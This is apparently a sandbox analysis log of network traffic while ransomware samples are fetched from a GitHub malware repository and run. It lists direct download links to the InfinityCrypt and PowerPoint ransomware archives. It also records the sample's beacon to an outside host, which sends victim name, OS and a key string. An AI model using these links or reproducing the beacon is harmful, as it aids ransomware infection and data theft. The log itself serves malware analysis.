GET https://github.com/Endermanch/MalwareDatabase/tree/master/enderwareHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/enderwareHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/enderwareHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/enderwareHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwaresHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwaresHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwaresHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwaresHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zipHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zipHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zipHTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipHTTP Response
302 -
185.199.108.154:443https://github.githubassets.com/assets/react-code-view-c1d9359a2889.jstls, http2msedge.exe41.5kB 1.2MB 644 992
HTTP Request
GET https://github.githubassets.com/assets/light-0f9c7cd68e73.cssHTTP Request
GET https://github.githubassets.com/assets/global-ad129b4b6387.cssHTTP Request
GET https://github.githubassets.com/assets/primer-48c59db9c012.cssHTTP Request
GET https://github.githubassets.com/assets/primer-primitives-03314b57bb48.cssHTTP Request
GET https://github.githubassets.com/assets/dark-13e7ced9cfd1.cssHTTP Request
GET https://github.githubassets.com/assets/code-65d301a8c835.cssHTTP Request
GET https://github.githubassets.com/assets/repository-2e900f0ac288.cssHTTP Request
GET https://github.githubassets.com/assets/github-909d3a6d1216.cssHTTP Request
GET https://github.githubassets.com/assets/react-lib-3a96fca5389a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_js-d9cd558a3443.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-541a38-c11d7563bc20.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a2cbf.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-ffa038d7f274.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_node_modules_primer_octicons-react_dist_index_esm_mjs-8030d6011494.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-a9437e7d3d6a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-3ddd3412665d.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AnchoredOverlay_AnchoredOverlay_js-4c761b535add.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-2b1dbeadb6d4.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-ef61f54e24f4.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-node_modules_primer_react_lib-esm_-7f6456-ff35cd66fa9c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-node_modules_primer_react_-028b5a-c5c4f2955fc6.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_safe-storage_safe-storage_ts-ui_-682c2c-173099330e24.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-922fee1fcbe0.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-01bf310f9cb6.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-e725dc-2ace46dba7e0.jsHTTP Request
GET https://github.githubassets.com/assets/repos-overview-1a9ffb795115.jsHTTP Request
GET https://github.githubassets.com/assets/wp-runtime-490e761b329f.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-13ee51630182.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-7bd350d761f4.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_smoothscroll-polyfill_dist_smoothscroll_js-node_modules_stacktrace-parse-a448e4-bb5415637fe0.jsHTTP Request
GET https://github.githubassets.com/assets/environment-b9fd6c57ed9b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_details-d-ed9a97-3fb8ce186301.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_stacktrace-parser_dist_stack-443cd5-1ba4dbac454f.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-7dc906febe69.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-28f0ee9fece0.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-types-policies_policy_ts-ui_packages-6fe316-8ed7f869463a.jsHTTP Request
GET https://github.githubassets.com/assets/github-elements-f7fe73c93e30.jsHTTP Request
GET https://github.githubassets.com/assets/element-registry-7a4a1ad7d028.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-4da1df-9de8d527f925.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-fd5530-6f4d94175afe.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_memoize_dist_esm_index_js-05801f7ca718.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-a8ec7ed862cf.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d91-d831c241f313.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_session-resume_dist_index_js-node_modules_primer_behaviors_dist_e-da6ec6-3f39339c9d98.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-b0f4de5b992f.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_sudo_sudo_ts-74c0d1051bc3.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ui_packages_hydro-analytics_hydro-analytics_ts-82813f-2f25462cf4b0.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-355eb4940fad.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-1390d8d5a0dc.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-2e2258-057ee3dfb92c.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-103883687a95.jsHTTP Request
GET https://github.githubassets.com/assets/behaviors-6de464341e2e.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-2ea61fcc9a71.jsHTTP Request
GET https://github.githubassets.com/assets/notifications-global-6d6db5144cc3.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-f924cc31bbb1.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-2b432e185ab2.jsHTTP Request
GET https://github.githubassets.com/assets/codespaces-d1c97ee1a640.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-1f9a80-8656545a294a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-9dbbd2-bc37e798adeb.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_repositories_get-repo-element_ts-c4da75162aa4.jsHTTP Request
GET https://github.githubassets.com/assets/repositories-dea97b58db36.jsHTTP Request
GET https://github.githubassets.com/assets/code-menu-67595c3a6d0c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--b964b4-60018fb56234.jsHTTP Request
GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-9a5d036ad405.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-674f4853d4fe.jsHTTP Request
GET https://github.githubassets.com/assets/sessions-f9a6b5829a62.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-11c80a0-09f82b2af635.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-ce8b18080d9c.jsHTTP Request
GET https://github.githubassets.com/assets/node_modules_github_mini-throttle_dist_index_js-app_assets_modules_github_blob-anchor_ts-app_-55c012-6f0349cfd4d6.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_assets_modules_github_visible_ts-app_components_search_qbsearch-input-element_ts-ui_packa-6009e2-1852366f7616.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-de7fa58bee69.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_ghcc-consent-element_ts-5f065a01fd56.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-ui_packages_safe-storage_safe-storage_ts-3d55cbd7ee1a.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-3f73a4-a192cb57381c.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-f92c1226319d.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-node_modules_primer_behaviors_dist_esm_scroll-into-view_js-e237597b3b95.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/react-code-view.f2d60f636eb02c2001df.module.cssHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-7742a325a895.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_ConfirmationDialog_js-8fb4cb0b8bf3.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Heading_Heading_js-node_modules_primer_react_lib-es-09461f-b6800c935d2b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Label_Label_js-node_modules_primer_react_lib-esm_Se-443e5e-732d80415edc.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-6dc608-b1ae62f152fd.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-1b1f53d95ef9.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-59a8e3-d8a8a30fe2d7.jsHTTP Request
GET https://github.githubassets.com/assets/react-code-view-c1d9359a2889.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
185.199.108.133:443https://avatars.githubusercontent.com/u/44542704?v=4&size=40tls, http2msedge.exe3.0kB 27.7kB 34 44
HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/51242428?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/39349444?s=64&v=4HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://avatars.githubusercontent.com/u/17717494?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/42248228?s=64&v=4HTTP Response
200HTTP Response
200HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?v=4&size=40HTTP Response
200 -
1.0kB 4.7kB 11 9
-
1.0kB 4.7kB 11 9
-
977 B 4.1kB 10 8
-
1.0kB 4.7kB 11 9
-
1.0kB 4.7kB 11 9
-
190 B 132 B 4 3
-
98 B 52 B 2 1
-
190 B 132 B 4 3
-
185.199.110.133:443https://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67tls, http2msedge.exe2.4kB 6.2kB 20 24
HTTP Request
GET https://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67HTTP Response
502HTTP Request
GET https://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67HTTP Response
502 -
31.7kB 18.2kB 82 83
HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204 -
885 B 4.3kB 8 5
-
185.199.108.154:443https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40tls, http2msedge.exe2.8kB 28.6kB 32 38
HTTP Request
GET https://github.githubassets.com/favicons/favicon.svgHTTP Request
GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.pngHTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/favicons/favicon.pngHTTP Response
200HTTP Request
GET https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40HTTP Response
200 -
885 B 4.3kB 8 5
-
72.3kB 15.3kB 89 79
HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200 -
185.199.108.133:443https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PowerPoint.ziptls, http2msedge.exe4.0kB 112.8kB 57 97
HTTP Request
GET https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zipHTTP Response
200HTTP Request
GET https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PowerPoint.zipHTTP Response
200 -
1.2kB 8.1kB 16 14
-
1.2kB 8.1kB 16 14
-
1.2kB 8.1kB 16 14
-
204.79.197.200:443https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90tls, http265.7kB 1.9MB 1373 1370
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
162.55.0.137:80http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CUWFSkxXxXxHpxXxkSIjxXxMkIOxXxoyx3xXxKhPoxXx%7CMicrosoft%20Windows%2010%20Pro%7CA58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619%7C3035httpEndermanch@InfinityCrypt.exe869 B 7.9kB 8 9
HTTP Request
GET http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CUWFSkxXxXxHpxXxkSIjxXxMkIOxXxoyx3xXxKhPoxXx%7CMicrosoft%20Windows%2010%20Pro%7CA58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619%7C3035HTTP Response
403 -
20.26.156.215:443https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/PowerPoint.ziptls, http2msedge.exe2.9kB 21.6kB 23 30
HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zipHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/PowerPoint.zipHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/PowerPoint.zipHTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/PowerPoint.zipHTTP Response
302 -
2.3kB 5.4kB 16 16
HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200
-
62 B 94 B 1 1
DNS Request
malwarewatch.org
DNS Response
104.21.46.176172.67.168.207
-
55 B 135 B 1 1
DNS Request
unpkg.com
DNS Response
104.17.248.203104.17.245.203104.17.247.203104.17.249.203104.17.246.203
-
65 B 149 B 1 1
DNS Request
use.fontawesome.com
DNS Response
172.67.142.245104.21.27.152
-
72 B 134 B 1 1
DNS Request
176.46.21.104.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
183.142.211.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
72.32.126.40.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
71.121.18.2.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
203.248.17.104.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
245.142.67.172.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
170.201.250.142.in-addr.arpa
-
127 B 402 B 2 2
DNS Request
www.youtube.com
DNS Response
142.250.179.78142.250.179.110142.250.178.142142.250.201.174172.217.18.206142.250.74.238142.250.75.238216.58.214.174172.217.20.174172.217.20.206216.58.215.46216.58.213.78
DNS Request
collector.github.com
DNS Response
140.82.113.22
-
57 B 201 B 1 1
DNS Request
i.ytimg.com
DNS Response
142.250.179.86142.250.179.118142.250.178.150142.250.201.182142.250.74.246142.250.75.246216.58.214.182172.217.20.182172.217.20.214
-
31.2kB 1.0MB 157 763
-
10.6kB 1.1MB 136 822
-
73 B 171 B 1 1
DNS Request
163.20.217.172.in-addr.arpa
-
73 B 112 B 1 1
DNS Request
78.179.250.142.in-addr.arpa
-
73 B 112 B 1 1
DNS Request
86.179.250.142.in-addr.arpa
-
73 B 89 B 1 1
DNS Request
googleads.g.doubleclick.net
DNS Response
172.217.20.194
-
68 B 84 B 1 1
DNS Request
static.doubleclick.net
DNS Response
172.217.20.198
-
67 B 243 B 1 1
DNS Request
jnn-pa.googleapis.com
DNS Response
216.58.214.170172.217.20.170172.217.20.202216.58.215.42216.58.213.74142.250.179.74142.250.179.106142.250.178.138142.250.201.170142.250.74.234142.250.75.234
-
3.6kB 7.3kB 8 10
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.178.132
-
59 B 120 B 1 1
DNS Request
yt3.ggpht.com
DNS Response
142.250.179.97
-
6.3kB 51.9kB 28 48
-
73 B 171 B 1 1
DNS Request
194.20.217.172.in-addr.arpa
-
73 B 171 B 1 1
DNS Request
198.20.217.172.in-addr.arpa
-
73 B 173 B 1 1
DNS Request
170.214.58.216.in-addr.arpa
-
73 B 111 B 1 1
DNS Request
97.179.250.142.in-addr.arpa
-
74 B 112 B 1 1
DNS Request
132.178.250.142.in-addr.arpa
-
72 B 169 B 1 1
DNS Request
67.213.58.216.in-addr.arpa
-
56 B 151 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.23713.107.21.237
-
73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
461 B 7
-
71 B 135 B 1 1
DNS Request
170.61.62.23.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
20.26.156.215
-
75 B 139 B 1 1
DNS Request
avatars.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
69 B 133 B 1 1
DNS Request
github.githubassets.com
DNS Response
185.199.108.154185.199.110.154185.199.111.154185.199.109.154
-
75 B 253 B 1 1
DNS Request
github-cloud.s3.amazonaws.com
DNS Response
54.231.165.19352.216.161.10716.182.71.24152.216.40.21752.217.143.3354.231.200.152.216.187.2752.216.141.196
-
79 B 143 B 1 1
DNS Request
user-images.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
144 B 272 B 2 2
DNS Request
camo.githubusercontent.com
DNS Request
camo.githubusercontent.com
DNS Response
185.199.110.133185.199.111.133185.199.109.133185.199.108.133
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
144 B 316 B 2 2
DNS Request
215.156.26.20.in-addr.arpa
DNS Request
215.156.26.20.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.108.199.185.in-addr.arpa
-
148 B 236 B 2 2
DNS Request
154.108.199.185.in-addr.arpa
DNS Request
154.108.199.185.in-addr.arpa
-
120 B 152 B 2 2
DNS Request
api.github.com
DNS Request
api.github.com
DNS Response
20.26.156.210
DNS Response
20.26.156.210
-
148 B 236 B 2 2
DNS Request
133.110.199.185.in-addr.arpa
DNS Request
133.110.199.185.in-addr.arpa
-
144 B 234 B 2 2
DNS Request
22.113.82.140.in-addr.arpa
DNS Request
22.113.82.140.in-addr.arpa
-
144 B 316 B 2 2
DNS Request
210.156.26.20.in-addr.arpa
DNS Request
210.156.26.20.in-addr.arpa
-
144 B 292 B 2 2
DNS Request
157.123.68.40.in-addr.arpa
DNS Request
157.123.68.40.in-addr.arpa
-
142 B 290 B 2 2
DNS Request
206.23.85.13.in-addr.arpa
DNS Request
206.23.85.13.in-addr.arpa
-
142 B 232 B 2 2
DNS Request
0.204.248.87.in-addr.arpa
DNS Request
0.204.248.87.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.108.133185.199.111.133185.199.110.133185.199.109.133
-
71 B 135 B 1 1
DNS Request
202.121.18.2.in-addr.arpa
-
140 B 266 B 2 2
DNS Request
18.107.17.2.in-addr.arpa
DNS Request
18.107.17.2.in-addr.arpa
-
144 B 316 B 2 2
DNS Request
21.236.111.52.in-addr.arpa
DNS Request
21.236.111.52.in-addr.arpa
-
124 B 346 B 2 2
DNS Request
tse1.mm.bing.net
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.20013.107.21.200
DNS Response
204.79.197.20013.107.21.200
-
138 B 170 B 2 2
DNS Request
arizonacode.bplaced.net
DNS Request
arizonacode.bplaced.net
DNS Response
162.55.0.137
DNS Response
162.55.0.137
-
142 B 198 B 2 2
DNS Request
137.0.55.162.in-addr.arpa
DNS Request
137.0.55.162.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
20.26.156.215
-
120 B 152 B 2 2
DNS Request
api.github.com
DNS Request
api.github.com
DNS Response
20.26.156.210
DNS Response
20.26.156.210
-
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619
